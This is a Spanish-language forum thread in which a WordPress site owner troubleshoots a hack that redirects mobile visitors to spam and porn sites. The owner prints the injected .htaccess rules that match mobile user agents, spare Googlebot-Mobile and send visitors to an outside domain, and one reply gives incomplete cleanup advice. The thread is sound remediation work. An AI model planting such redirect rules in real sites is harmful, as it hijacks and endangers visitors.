Mi web me redirige hacia varios links entre esos algunas paginas porno ayuda

Exerion · 23 Sep 2016

saludos, busque en el foro y no pude hallar respuestas por eso lo vengo a exponer aca

hace unos dias que quiero entrar a mis sitios para ver unos enlaces q iba a compartir y resulta q al acceder desde mi telefono android me doy cuenta que redirige hacia muchos enlaces raros y hasta a paginas web pornos

esto solo pasa cuando alguien ingresa desde algun dispositivo movil, pero no pasa cuando se accede mediante una PC...

alguien me pueda ayudar en esto?? me puede decir que puede estar pasando... por donde empiezo a revisar mis sitios ???

agradeceria a algun experto en WP que quizas me pueda ayudar

saludos:grumpy:

georgebena · 23 Sep 2016

Tienes algún sistema de anuncios que no sea Adsense? Algún plugin que redireccione ó que saque popups?

cybermeta · 23 Sep 2016

Me parece que puedes ser algo que tengas en el teléfono. un virus, por ejemplo, ¿ya probaste desde una tablet android u otro teléfono móvil?

gerardoMx · 23 Sep 2016

Revisa los anuncios moviles, puede que esten redireccionando.

iniciopublic · 23 Sep 2016

Muéstranos la url

Dalkiel · 23 Sep 2016

[MENTION=155101]Exerion[/MENTION] buenas amigo, proporcionanos por MP las URL o un par de URL para revisarlas.

Atilasyor · 23 Sep 2016

Mi estimado amigo lo mas seguro es que tienes o conseguiste algún theme de pago , pero gratis, y por lo general estos theme tiene lineas de código adicional , esto es lo que le ha pasado algunos de mis clientes , quizás sea tu caso.
Suerte

Exerion · 23 Sep 2016

Dalkiel dijo:
[MENTION=155101]Exerion[/MENTION] buenas amigo, proporcionanos por MP las URL o un par de URL para revisarlas.

mp enviado amigo... ojala me puedas dar una mano

- - - Actualizado - - -

Atilasyor dijo:
Mi estimado amigo lo mas seguro es que tienes o conseguiste algún theme de pago , pero gratis, y por lo general estos theme tiene lineas de código adicional , esto es lo que le ha pasado algunos de mis clientes , quizás sea tu caso.
Suerte

no amigo ambos themes los baje de paginas gratuitas y empezo a ocurrir hace un par de dias

ramones33 · 23 Sep 2016

Hola, puede que tu web o tu telf tengan malware, lo del teléfono lo puedes verificar con el de otra persona que te haga el favor de visitar tu web.

Con respecto a tu web, lo mejor sería, si es que no vas a perder much contenido publicado reciéntemente, volver algún respaldo anterior a que este problema se empezara a presentar, ten mucho cuidado con plugins, empresas de publicidad y themes que no provengan de fuentes oficiales.

Qué plantilla y que plgins tienes activos?

Saludos

Josepher · 23 Sep 2016

Amigo eso ha de ser algun virus o algo por el estilo, un amigo le paso lo mismo y bueno tuvo que analizar el theme y las ultimas cosas que había subido a su hosting.

ramones33 · 23 Sep 2016

También puedes revisar tu web con

https://www.virustotal.com/es/
https://sitecheck.sucuri.net/results/tusitio.ltd

Y por supuesto, con Wordfence

Exerion · 23 Sep 2016

georgebena dijo:
Tienes algún sistema de anuncios que no sea Adsense? Algún plugin que redireccione ó que saque popups?

no no tengo nada de eso, habia puesto en una de la spaginas adbooht pero lo quite por q no me gusto, la otra pagina nunca le meti nada

- - - Actualizado - - -

cybermeta dijo:
Me parece que puedes ser algo que tengas en el teléfono. un virus, por ejemplo, ¿ya probaste desde una tablet android u otro teléfono móvil?

de hecho me salia q habia un virus en mi navegador y esas cosas, pero le pase virus y nada, limpio todo y o hallo nada, y desde otros telefonos d emis amigos tambien salia la redireccion y el aviso de contenido porno y virus

- - - Actualizado - - -

iniciopublic dijo:
Muéstranos la url

las paginas son: Mega Utilidades - Todas tus utilidades al alcance de un clic y Viralizado | Lo mejor de lo mejor en toda la red, Viralizate tu también ?

- - - Actualizado - - -

Dalkiel dijo:
[MENTION=155101]Exerion[/MENTION] buenas amigo, proporcionanos por MP las URL o un par de URL para revisarlas.

ahi deje las web amigo

las paginas son: Mega Utilidades - Todas tus utilidades al alcance de un clic y Viralizado | Lo mejor de lo mejor en toda la red, Viralizate tu también ?

- - - Actualizado - - -
[MENTION=111024]ramones33[/MENTION] ahi deje los links de las paginas, los themes los tome de una pagina q son reconocidas de themes gartuitos

- - - Actualizado - - -
[MENTION=111024]ramones33[/MENTION] a,igo he escaneado las web con: https://sitecheck.sucuri.net y me dio estos resultados

http://prntscr.com/clooov

http://prntscr.com/clopk5

me salieron ambas con virus

Dalkiel · 23 Sep 2016

[MENTION=155101]Exerion[/MENTION] revisa mis MP que te envie temprano.

ramones33 · 24 Sep 2016

Pide a tu hosting que haga una revisión, instala wordfence o puedes contratar a alguien que te de una mano. Saludos

piano · 24 Sep 2016

Vaya por delante que no soy ningún experto en esto pero revisando el código fuente de tus páginas aparecen scripts que no deberían estar ahí.

Hay dos scripts muy sospechosos. Uno de ellos tiene un link a un archivo .php alojado en "sglcoop.it"
El otro script está cargando justo antes que el anterior y aunque no tengo muy claro que es lo que hace, desde luego buena pinta no tiene.
Yo lo que haría sería bajar las carpetas de archivos de ambos sitios a mi máquina y buscar los dos scripts con Notepad++. En algún lugar tienen que estar y ahí donde los encuentres directamente los borras, previa copia de seguridad, por supuesto.

Esta solución no es la ideal, nada te garantiza que no haya otros códigos por ahí ocultos, pero al menos como primera medida provisional para que dejen de cargar los redirects te debería servir.

Exerion · 24 Sep 2016

piano dijo:
Vaya por delante que no soy ningún experto en esto pero revisando el código fuente de tus páginas aparecen scripts que no deberían estar ahí.

Hay dos scripts muy sospechosos. Uno de ellos tiene un link a un archivo .php alojado en "sglcoop.it"
El otro script está cargando justo antes que el anterior y aunque no tengo muy claro que es lo que hace, desde luego buena pinta no tiene.
Yo lo que haría sería bajar las carpetas de archivos de ambos sitios a mi máquina y buscar los dos scripts con Notepad++. En algún lugar tienen que estar y ahí donde los encuentres directamente los borras, previa copia de seguridad, por supuesto.

Esta solución no es la ideal, nada te garantiza que no haya otros códigos por ahí ocultos, pero al menos como primera medida provisional para que dejen de cargar los redirects te debería servir.

gracias x el comentario amigo, justamente anoche buscaba los archivos principales, los index y los header y vi q habia codigo q no recuerdo, y obvio los vi como sospechosos

afortunadamente tengo respaldos gusrdados de los dias previos antes q pasara este error...

debo apuntar a q en el server hubo contaminacion, ya hemos reportado por si acaso

- - - Actualizado - - -

Dalkiel dijo:
[MENTION=155101]Exerion[/MENTION] revisa mis MP que te envie temprano.

ademas de lo q te mencione q habia en el header.php tambien abri el .htaceess y consegui esto:

RewriteEngine On

RewriteCond %{HTTP_ACCEPT} "text/vnd.wap.wml|application/vnd.wap.xhtml+xml" [NC,OR]

RewriteCond %{HTTP_USER_AGENT} "android|BlackBerry|htc|iPad|iPhone|iPod|kindle|lg|midp|mmp|mobile|mot|nokia|o2|opera mini|J2ME" [NC,OR]

RewriteCond %{HTTP_USER_AGENT} "palm|pocket|psp|sgh|smartphone|sonyericsson|symbian|treo mini|up.browser|up.link|vodafone|wap" [NC]

RewriteCond %{HTTP_USER_AGENT} !Googlebot-Mobile [NC]

RewriteRule ^(.*)$ http://seokirja.com [L,R=302]

# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>

# END WordPress

donde este enlace: http://seokirja.com es a donde redirije mis paginas :/ en definitiva si fue contaminacion en el server...

lo q hice fue eliminar el htacceess de mis carpetas

hice mal?? es necesario tener el .hatcces ??

q lineas debo eliminar?? para q quede como estaba ?

Dalkiel · 25 Sep 2016

[MENTION=155101]Exerion[/MENTION] muy bien, es como te lo mencione debía de estar en el .htaccess un redireccionamiento, lo que debes de borrar son estas lineas:

Insertar CODE, HTML o PHP:

RewriteCond %{HTTP_USER_AGENT} !Googlebot-Mobile [NC]
RewriteRule ^(.*)$ [URL="http://seokirja.com/"]http://seokirja.com[/URL] [L,R=302]

Y usa el Wordefence para analizar tus archivos de tu web y ver que cosas contiene malware.

Exerion · 25 Sep 2016

Dalkiel dijo:
[MENTION=155101]Exerion[/MENTION] muy bien, es como te lo mencione debía de estar en el .htaccess un redireccionamiento, lo que debes de borrar son estas lineas:

Insertar CODE, HTML o PHP:

RewriteCond %{HTTP_USER_AGENT} !Googlebot-Mobile [NC] RewriteRule ^(.*)$ [URL="http://seokirja.com/"]http://seokirja.com[/URL] [L,R=302]

Y usa el Wordefence para analizar tus archivos de tu web y ver que cosas contiene malware.

excelente, gracias por el dato amigo.. ya mismo voy

Adrián Freecss · 25 Sep 2016

Exerion dijo:
excelente, gracias por el dato amigo.. ya mismo voy

Además de eliminar eso, hay que ver cómo fue que se infectó tu sitio, quizá tienes alguna vulnerabilidad de la que alguien se aprovechó; más que arreglar el error, hay que evitar que vuelva a suceder.

lmendez · 1 Oct 2016

También puedes Revisar los archivos del ftp. es posible que tengas algúnos archivos maliciosos. Si posees backup siempre es mejor restaurarlo y ahorrarte ese tedioso trabajo de limpiar manualmente